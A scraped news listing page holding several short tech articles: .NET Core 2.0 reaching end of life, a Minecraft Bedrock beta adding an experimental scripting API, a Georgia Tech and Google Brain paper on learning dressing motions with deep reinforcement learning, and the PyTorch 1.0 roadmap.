.NET Core 2.0 was released mid August 2017. It has now reached end of life (EOL) and will no longer be supported by Microsoft. .NET Core 2.0 EOL .NET Core 2.1 was released towards the end of May 2018 and .NET Core 2.0 reached EOL on October 1. This was supposed to happen on September 1 but was pushed by a month since users experienced issues in upgrading to the newer version. .NET Core 2.1 is a long-term support (LTS) release and should be supported till at least August 2021. It is recommended to upgrade to and use .NET Core 2.1 for your projects. There are no major changes in the newer version. .NET Core 2.0 is no longer supported and updates won’t be provided. The installers, zips and Docker images of .NET Core 2.0 will still remain available, but they won’t be supported. Downloads for 2.0 will still be accessible via the Download Archives. However, .NET Core 2.0 is removed from the microsoft/dotnet repository README file. All the existing images will still be available in that repository. Microsoft’s support policy The ‘LTS’ releases contain stabilized features and components. They require fewer updates over their longer support release lifetime. The LTS releases are a good choice for applications that developers do not intend to update very often. The ‘current’ releases include features that are new and may undergo changes in the future based on feedback/issues. They give access to the latest features and improvements and hence are a good choice for applications in active development. Upgrades to newer .NET Core releases is required more frequently to stay in support. Some of the new features in .NET Core 2.1 include performance improvements, long term support, Brotli compression, and new cryptography APIs. To migrate from .NET Core 2.0 to .NET Core 2.1, visit the Microsoft website. You can read the official announcement on GitHub. Note: article amended 08.10.2018 - .NET Core 2.0 reached EOL on October 1, not .NET Core 2.1. The installers, zips and Docker images will still remain available but won't be supported, not unsupported. .NET announcements: Preview 2 of .NET Core 2.2 and Entity Framework Core 2.2, C# 7.3, and ML.NET 0.5 Microsoft’s .NET Core 2.1 now powers Bing.com Use App Metrics to analyze HTTP traffic, errors & network performance of a .NET Core app [Tutorial]
Read more
  • 0
  • 4
  • 5952

article-image-minecraft-bedrock-beta-1-9-0-3-is-out-with-experimental-scripting-api
Natasha Mathur
10 Dec 2018
2 min read
Save for later

Minecraft Bedrock beta 1.9.0.3 is out with experimental scripting API!

Natasha Mathur
10 Dec 2018
2 min read
Minecraft team released Minecraft Bedrock beta 1.9.0.3 last week. The latest release explores new feature such as scripting API, along with minor changes and fixes. Let’s have a look at what’s new in Minecraft Bedrock 1.9.0.3 (beta). Experimental Scripting API Minecraft Bedrock beta 1.9.0.3 comes with a new Scripting API that allows users to tweak the inner components within a game by writing commands. The Minecraft Script Engine uses the JavaScript language with the help of which Scripts can be written and bundled along with Behaviour Packs to invoke different actions. These actions include listening to and responding to game events, retrieving and modifying data in components that entities have, and that can affect different parts of the game. This feature is currently only available in Windows 10 on enabling the “Use Experimental Gameplay” setting. Changes and Fixes A minor change has been made to the size of the crossbow, as it now appears bigger in pillager’s (hostile illager mobs with crossbows in Minecraft) hands. A crash occurring during gameplay has been fixed. The issue of tamed llamas turning into bioluminescent creatures on opening an inventory has been resolved. Items in hand appearing completely white in colour have been fixed. Rare instances of players getting teleported into a boat while travelling near water have been fixed. The issue of logo not being visible on the loading screen after suspending and resuming the game has been fixed. With the new release, players no longer have an option to respawn in a semi-dead state in case they get killed while in a bed. The texture of the Beacon beams has been improved. The inventory blocks once again follow the textures that are set in blocks.json. Optimizations have been done to get a proper synchronization between client and server. Minecraft bedrock beta 1.9.0.3 is available only on Xbox One, Windows 10, and Android (Google Play). For more information, check out the official release notes. Minecraft Java team are open sourcing some of Minecraft’s code as libraries Minecraft is serious about global warming, adds a new (spigot) plugin to allow changes in climate mechanics A Brief History of Minecraft Modding
Read more
  • 0
  • 0
  • 5923
article-image-this-ai-generated-animation-can-dress-like-humans-using-deep-reinforcement-learning
Prasad Ramesh
02 Nov 2018
4 min read
Save for later

This AI generated animation can dress like humans using deep reinforcement learning

Prasad Ramesh
02 Nov 2018
4 min read
In a paper published this month, the human motions to wear clothes is synthesized in animation with reinforcement learning. The paper named Learning to Dress: Synthesizing Human Dressing Motion via Deep Reinforcement Learning was published yesterday. The team is made up of two Ph.D. students from The Georgia Institute of Technology, two of its professors and a researcher from Google Brain. Understanding the dressing problem Dressing, putting on a t-shirt or a jacket is something we do every day. Yet it is a computationally costly and complex task for a machine to perform or be simulated by computers. Techniques in physics simulation and machine learning are used in this paper to simulate an animation. A physics engine is used to simulate character motion and cloth motion. On the other hand deep reinforcement learning on a neural network is used to produce character motion. Physics engine and reinforcement learning on a neural network The authors of the paper introduce a salient representation of haptic information to guide the dressing process. Then the haptic information is used in the reward function to provide learning signals when training the network. As the task is too complex to do perform in one go, the dressing task is separated into several subtasks for better control. A policy sequencing algorithm is introduced to match the distribution of output states from one task to the input distribution for the next task. The same approach is used to produce character controllers for various dressing tasks like wearing a t-shirt, wearing a jacket, and robot-assisted dressing of a sleeve. Dressing is complex, split into several subtasks The approach taken by the authors splits the dressing task into a sequence of subtasks. Then a state machine guides the between these tasks. Dressing a jacket, for example, consists of four subtasks: Pulling the sleeve over the first arm. Moving the second arm behind the back to get in position for the second sleeve. Putting hand in the second sleeve. Finally, returning the body back to a rest position. A separate reinforcement learning problem is formulated for each subtask in order to learn a control policy. The policy sequencing algorithm ensures that these individual control policies can lead to a successful dressing sequence on being executed sequentially. The algorithm matches the initial state of one subtask with the final state of the previous subtask in the sequence. A variety of successful dressing motions can be produced by applying the resultant control policies. Each subtask in the dressing task is formulated as a partially observable Markov Decision Process (POMDP). Character dynamics are simulated with Dynamic Animation and Robotics Toolkit (DART) and cloth dynamics with NVIDIA PhysX. Conclusion and room for improvement A system that learns to animate a character that puts on clothing is successfully created with the use of deep reinforcement learning and physics simulation. From the subtasks, the system learns each sub-task individually, then connects them with a state machine. It was found that carefully selecting the cloth observations and the reward functions were important factors for the success of the approach taken. This system currently performs only upper body dressing. For lower body, a balance into the controller would be required. The number of subtasks might reduce on using a control policy architecture with memory. This will allow for greater generalization of the skills learned. You can read the research paper at the Georgia Institute of Technology website. Facebook launches Horizon, its first open source reinforcement learning platform for large-scale products and services Deep reinforcement learning – trick or treat? Google open sources Active Question Answering (ActiveQA), a Reinforcement Learning based Q&A system
Read more
  • 0
  • 0
  • 5920

article-image-can-a-production-ready-pytorch-1-0-give-tensorflow-a-tough-time
Sunith Shetty
03 May 2018
5 min read
Save for later

Can a production ready Pytorch 1.0 give TensorFlow a tough time?

Sunith Shetty
03 May 2018
5 min read
PyTorch has announced a preview of the blueprint for PyTorch 1.0, the next major release of the framework. This breakthrough version is expected to bring more stability, integration support and complete production backing allowing developers to move from core research to production in an amicable way without having to deal with any migration challenges. PyTorch is an open-source Python-based scientific computing package which provides powerful GPU acceleration. PyTorch is known for advanced indexing and functions, imperative style, integration support and API simplicity. This is one of the key reasons why developers prefer PyTorch for research and hackability. To know more about how Facebook-based PyTorch competes with Google’s TensorFlow read our take on this deep learning war. Some of the noteworthy changes in the roadmap for PyTorch 1.0 are: Production support One of the biggest challenges faced by developers in terms of using PyTorch is production support. There are n number of issues faced while trying to run the models efficiently in production environments. Even though PyTorch provides excellent simplicity and flexibility, due to its tight coupling to Python, the performance at production-scale is a challenge.   To counter these challenges, the PyTorch team has decided to bring PyTorch and Caffe2 together to provide production-scale readiness to the developers. However, adding production support brings complexity and configurable options for models in the API. The PyTorch team will stick to the goal of keeping the platform -- a favorable choice -- for researchers and developers. Hence, they are introducing a new just-in-time (JIT) compiler, named torch.jit. torch.jit compiler rewrites PyTorch models during runtime in order to achieve scalability and efficiency in production environments. It can also export PyTorch models to run in a C++ environment. (runtime based on Caffe2 bits) Note: In PyTorch version 1.0, your existing code will continue to work as-is. Let’s go through how JIT compiler can be used to export models to a Python-less environment in order to improve their working performance. torch.jit: The go-to compiler for your PyTorch models Building models using Python code, no doubt gives maximum productivity and makes PyTorch very simple and easy-to-use. However, this also means PyTorch finding it difficult to know which operation you will run next. This can be frustrating for the developers during model export and automatic performance optimizations because they need to be aware of how the computations will look like before it even gets implemented. To deal with these issues, PyTorch provides two ways of recovering information from the Python code. Both these methods will be useful based on different contexts, giving you the leverage to use/mix them with ease. Tracing the native Python code Compiling a subset of the Python language Tracing mode torch.jit.trace function allows you to record the native PyTorch operations performed along with the data dependencies between them. PyTorch version 0.3 already had a tracer function which is used to export models through ONNX. This new version uses a high-performance C++ runtime that allows PyTorch to re-execute programs for you. The key advantage of using this method is that it doesn’t have to deal with how your Python code is structured since we only trace through native PyTorch operations. Script mode PyTorch team has come up with a solution called scripting mode made specially for those models such as RNNs which make use of control flow. However, you will have to write out a regular Python function (avoiding complex language features) In order to get your function compiled, you can assign @script decorator. This will make sure it alters your Python function directly into high-performance C++ during runtime. Advantages in optimization and export techniques Irrespective of you using a trace or a script function, the technique allows you to optimize/export the model for use in production environments (i.e. Python-free portrayal of the model) Now you can derive bigger segments of the model into an intermediate representation to work with sophisticated models. You can use high-performance backends available in Caffe2 to run the models efficiently Usability If you don’t need to export or optimize your model, you do not need to use these set of new features. These modes will be included into the core of the PyTorch ecosystem, thus allowing you to mix and match them with the existing code seamlessly as per your needs. Additional changes and improvements In addition to the major update in the production support for 1.0, PyTorch team will continue working on optimizing, working on the stability of the interface, and fixing other modules in PyTorch ecosystem PyTorch 1.0 will see some changes in the backend side which might affect user-written C and C++ extensions. In order to incorporate new features and optimization techniques from Caffe2, PyTorch team is replacing (optimizing) the backend ATen library. PyTorch team is planning to release 1.0 during the summer. For the detailed preview of the roadmap, you can refer the official PyTorch blog. Top 10 deep learning frameworks The Deep Learning Framework Showdown: TensorFlow vs CNTK Why you should use Keras for deep learning
Read more
  • 0
  • 0
  • 5915